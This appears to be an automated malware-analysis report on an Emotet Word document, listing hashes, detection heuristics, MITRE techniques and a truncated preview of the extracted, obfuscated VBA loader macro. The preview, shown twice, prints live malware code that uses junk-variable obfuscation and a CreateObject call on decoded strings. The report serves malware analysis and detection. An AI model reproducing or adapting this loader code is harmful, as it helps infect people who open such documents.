Emotet Office (OLE) malware analysis — malicious · 1d6bd22c491db2f0

MALICIOUS

Office (OLE)

251.2 KB Created: 2019-11-07 07:13:00 Authoring application: Microsoft Office Word First seen: 2020-02-04

MD5: 8e733951981cca9a6e56b0c3d83605a6 SHA-1: 81d5062725feb14dd74c71b0c765f9c2275b0267 SHA-256: 1d6bd22c491db2f0407963456128a1e202d7e4198715b172fdfaa7565f186497

282 Risk Score

Malware Insights

Emotet · confidence 95%

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample is identified as malicious by ClamAV with the signature 'Doc.Downloader.Emotet-7378242-0'. Heuristics indicate the presence of an obfuscated auto-exec VBA loader that uses CreateObject and execution sinks, strongly suggesting it downloads and executes a second-stage payload. The autoopen macro and CreateObject calls are consistent with Emotet's typical behavior.

Heuristics 8

ClamAV: Doc.Downloader.Emotet-7378242-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Downloader.Emotet-7378242-0
VBA macros detected medium 4 related findings OLE_VBA_MACROS

Document contains VBA macro code
Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER

Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 38583 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	38583 bytes
SHA-256: `5457218b738ec8d37c96049172b41f534e5229f58cbd63a88879485b3835a6f1`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "Hmhezyqa" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Control = "Qvjlwolbyyop, 5, 2, INKEDLib, InkEdit" Attribute VB_Control = "Edgrxyfsvzc, 4, 3, INKEDLib, InkEdit" Attribute VB_Control = "Uulmwkep, 3, 4, INKEDLib, InkEdit" Attribute VB_Control = "Kggagryxte, 2, 5, INKEDLib, InkEdit" Attribute VB_Control = "Yxdwaahkoyn, 1, 6, INKEDLib, InkEdit" Attribute VB_Control = "Rlobxuvruqa, 0, 7, INKEDLib, InkEdit" Attribute VB_Name = "Kzpldvzk" Function Elkuczzie() On Error Resume Next Dim Bohsjohpqigeu As Double Dim Smfzupdc As Double Dim Ylixgdxazdv As Boolean Hppazbdxtxgkl = CDate(Skymzeldzsje) Vpjjpxje = Log("Ut optio eum repellat est.") Beqfncnu = "Ernesto" Dim Ipfijtwmq As Integer Wuuxhxawkjn = Sqr(660) Dim Kvngpwfpjdvg As Integer Avbwogmf = "Nam quia amet dolorum qui animi itaque." Dim Hgfmxkvuukynf As String Dim Tdamqyqywzajm As String Iflqyjrsszh = 521 Ycnqlaudms = Qiinwbjugcscp Dim Odcdlaymrp As Boolean Dim Nfczbbwcf As String Dim Zenuyccuibooh As String Qzpeaskji = CDate(Diteneygdzyf) Ouqhyruavk = Log("Chicken") Apeovehgyub = "Hübenbecker, Pichlmaier and Schimmer" Dim Kpawhstpulx As Boolean Jvxdmjha = Sqr(192) Dim Codtyslutm As Double Bueordxfegt = "Tonya" Dim Mivhrwmggyhd As String Dim Wjreiivtdzyre As Integer Fvukylkqmbpgi = 84 Wlthawmclkzt = Jasjiadmszkmt Dim Reoiedjk() Dim Tmifasdgefz As String Dim Zthzbyuq As Double Dim Rnzoxzxvcuotq As Integer Ulxjuestqmb = CDate(Fagaloqr) Fhgkxcnf = Log("Quis ad consequatur.") Lgnxgnsytjcwy = "Senkel, Kappe and Mensah" Dim Bnnibqwthrc As Integer Vrcgxbqymjtx = Sqr(100) Dim Yrbjijvvoaxb As Boolean Nggezydcgvy = "Kim" Dim Rpetkgyxc As String Dim Tezzdcjvr As Boolean Gdpywovlgk = 208 Dgkgnvkr = Ykvzdyem ReDim Reoiedjk(43) Dim Yefhesvmcra As Double Dim Jwmbugovpu As Integer Dim Ayysxbtxnmbj As Double Ezxqdnekxhram = CDate(Vijqpduxtf) Ewxvdhycp = Log("Esse accusantium vel.") Rbnqarbwohlsd = "Temporibus quis dolor." Dim Dskcdkmganzl As Double Ojwwjrpcntgs = Sqr(889) Dim Ysdtdkdf As String Uofuncafmd = "Carlsohn OHG" Dim Owuadbfqwkbli As Double Dim Ghdpjrkcum As Double Ktagfbaehzd = 833 Zcqjmtmf = Xioqgetaoimu Dim Bolgsxncg As Integer Dim Klqxagcoebhmo As Double Dim Xuzoiwqtmpd As Double Ajdewphwmkcdh = CDate(Ducxfeztcr) Urdiwgen = Log("Soap") Dpyurkjwlazeq = "Consectetur sunt consectetur perspiciatis eligendi illo odit quibusdam error quasi." Dim Gvtbqamcom As Integer Cgxdjqfrmy = Sqr(62) Dim Ojfgtcpbmv As Integer Llewqnkhnb = "Gruning - Kurnicki" Dim Nxpnkaahkgm As Integer Dim Gimxcwhpmrxm As Integer Zndzmcos = 49 Crlviaezxb = Ykkfzabfr Reoiedjk(1) = Hmhezyqa.Yxdwaahkoyn Dim Bnwfnigfgqdzz As String Dim Dwwavatshlfq As Double Dim Foxtuchz As Boolean Lmlseiwb = CDate(Nqsugziuot) Xebbfferndds = Log("Moguenara UG") Panzpevamo = "Computer" Dim Nvumkzwt As Integer Rcdrwcujm = Sqr(464) Dim Wjihpedvw As Integer Fcsjxbtevv = "Car" Dim Ikvxhsfdc As String Dim Qlmevvsxrpfxa As Double Ftqiekbbzwt = 766 Crokjfbylxxjd = Scnvyunm Dim Jygwwnjvasx As Double Dim Qrlmwgsbdw As Integer Dim Yjupxothz As Integer Byjipkwkl = CDate(Qfthoqaogc) Xeofdeehkan = Log("Zipp - Hütter") Nxcrhlfxnso = "Kazmarek - Marx" Dim Zchljcnilda As String Fhbapsjsbsxw = Sqr(707) Dim Jsklajnfbay As Double Wfbtcmngyv = "Clark" Dim Vnxxkjok As Double Dim Qbsavgaf As String Yimnayvj = 789 Kwxievphrq = Yspzbcrhf Set Dyvepznosaley = CreateObject(Vqqultpamr(Reoiedjk(1))) Dyvepznosaley.ShowWindow = 99 < 88 Dim Orupooumqgrn As Integer Dim Eemcnhcucfgol As Integer Dim Jjnkfmzwqpqq As String Avupxyztjmdp = CDate(Pjzcksgxedt) Iwmxrfbbj = Log("Sihler - Hahn") Oltqzagprkhgp = "Aut voluptatibus." Dim Emdrrwltr As Boolean Omktngxbnzzqx = Sqr(619) Dim Duubpwjmaoysu As Boolean Rcscmtfx = "Gloves" Dim Joagfvfn As Integer Dim Rzpiaeajeonc As Integer Hwxvrcywwa = 94 ... (truncated)

SHA-256: 5457218b738ec8d37c96049172b41f534e5229f58cbd63a88879485b3835a6f1

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "Hmhezyqa"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "Qvjlwolbyyop, 5, 2, INKEDLib, InkEdit"
Attribute VB_Control = "Edgrxyfsvzc, 4, 3, INKEDLib, InkEdit"
Attribute VB_Control = "Uulmwkep, 3, 4, INKEDLib, InkEdit"
Attribute VB_Control = "Kggagryxte, 2, 5, INKEDLib, InkEdit"
Attribute VB_Control = "Yxdwaahkoyn, 1, 6, INKEDLib, InkEdit"
Attribute VB_Control = "Rlobxuvruqa, 0, 7, INKEDLib, InkEdit"

Attribute VB_Name = "Kzpldvzk"
Function Elkuczzie()
On Error Resume Next
   Dim Bohsjohpqigeu As Double
Dim Smfzupdc As Double
Dim Ylixgdxazdv As Boolean
Hppazbdxtxgkl = CDate(Skymzeldzsje)
Vpjjpxje = Log("Ut optio eum repellat est.")
Beqfncnu = "Ernesto"
Dim Ipfijtwmq As Integer
Wuuxhxawkjn = Sqr(660)
Dim Kvngpwfpjdvg As Integer
Avbwogmf = "Nam quia amet dolorum qui animi itaque."
Dim Hgfmxkvuukynf As String
Dim Tdamqyqywzajm As String
Iflqyjrsszh = 521
Ycnqlaudms = Qiinwbjugcscp
   Dim Odcdlaymrp As Boolean
Dim Nfczbbwcf As String
Dim Zenuyccuibooh As String
Qzpeaskji = CDate(Diteneygdzyf)
Ouqhyruavk = Log("Chicken")
Apeovehgyub = "Hübenbecker, Pichlmaier and Schimmer"
Dim Kpawhstpulx As Boolean
Jvxdmjha = Sqr(192)
Dim Codtyslutm As Double
Bueordxfegt = "Tonya"
Dim Mivhrwmggyhd As String
Dim Wjreiivtdzyre As Integer
Fvukylkqmbpgi = 84
Wlthawmclkzt = Jasjiadmszkmt
Dim Reoiedjk()
   Dim Tmifasdgefz As String
Dim Zthzbyuq As Double
Dim Rnzoxzxvcuotq As Integer
Ulxjuestqmb = CDate(Fagaloqr)
Fhgkxcnf = Log("Quis ad consequatur.")
Lgnxgnsytjcwy = "Senkel, Kappe and Mensah"
Dim Bnnibqwthrc As Integer
Vrcgxbqymjtx = Sqr(100)
Dim Yrbjijvvoaxb As Boolean
Nggezydcgvy = "Kim"
Dim Rpetkgyxc As String
Dim Tezzdcjvr As Boolean
Gdpywovlgk = 208
Dgkgnvkr = Ykvzdyem
ReDim Reoiedjk(43)
   Dim Yefhesvmcra As Double
Dim Jwmbugovpu As Integer
Dim Ayysxbtxnmbj As Double
Ezxqdnekxhram = CDate(Vijqpduxtf)
Ewxvdhycp = Log("Esse accusantium vel.")
Rbnqarbwohlsd = "Temporibus quis dolor."
Dim Dskcdkmganzl As Double
Ojwwjrpcntgs = Sqr(889)
Dim Ysdtdkdf As String
Uofuncafmd = "Carlsohn OHG"
Dim Owuadbfqwkbli As Double
Dim Ghdpjrkcum As Double
Ktagfbaehzd = 833
Zcqjmtmf = Xioqgetaoimu
   Dim Bolgsxncg As Integer
Dim Klqxagcoebhmo As Double
Dim Xuzoiwqtmpd As Double
Ajdewphwmkcdh = CDate(Ducxfeztcr)
Urdiwgen = Log("Soap")
Dpyurkjwlazeq = "Consectetur sunt consectetur perspiciatis eligendi illo odit quibusdam error quasi."
Dim Gvtbqamcom As Integer
Cgxdjqfrmy = Sqr(62)
Dim Ojfgtcpbmv As Integer
Llewqnkhnb = "Gruning - Kurnicki"
Dim Nxpnkaahkgm As Integer
Dim Gimxcwhpmrxm As Integer
Zndzmcos = 49
Crlviaezxb = Ykkfzabfr
Reoiedjk(1) = Hmhezyqa.Yxdwaahkoyn
   Dim Bnwfnigfgqdzz As String
Dim Dwwavatshlfq As Double
Dim Foxtuchz As Boolean
Lmlseiwb = CDate(Nqsugziuot)
Xebbfferndds = Log("Moguenara UG")
Panzpevamo = "Computer"
Dim Nvumkzwt As Integer
Rcdrwcujm = Sqr(464)
Dim Wjihpedvw As Integer
Fcsjxbtevv = "Car"
Dim Ikvxhsfdc As String
Dim Qlmevvsxrpfxa As Double
Ftqiekbbzwt = 766
Crokjfbylxxjd = Scnvyunm
   Dim Jygwwnjvasx As Double
Dim Qrlmwgsbdw As Integer
Dim Yjupxothz As Integer
Byjipkwkl = CDate(Qfthoqaogc)
Xeofdeehkan = Log("Zipp - Hütter")
Nxcrhlfxnso = "Kazmarek - Marx"
Dim Zchljcnilda As String
Fhbapsjsbsxw = Sqr(707)
Dim Jsklajnfbay As Double
Wfbtcmngyv = "Clark"
Dim Vnxxkjok As Double
Dim Qbsavgaf As String
Yimnayvj = 789
Kwxievphrq = Yspzbcrhf
Set Dyvepznosaley = CreateObject(Vqqultpamr(Reoiedjk(1)))
Dyvepznosaley.ShowWindow = 99 < 88
   Dim Orupooumqgrn As Integer
Dim Eemcnhcucfgol As Integer
Dim Jjnkfmzwqpqq As String
Avupxyztjmdp = CDate(Pjzcksgxedt)
Iwmxrfbbj = Log("Sihler - Hahn")
Oltqzagprkhgp = "Aut voluptatibus."
Dim Emdrrwltr As Boolean
Omktngxbnzzqx = Sqr(619)
Dim Duubpwjmaoysu As Boolean
Rcscmtfx = "Gloves"
Dim Joagfvfn As Integer
Dim Rzpiaeajeonc As Integer
Hwxvrcywwa = 94
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.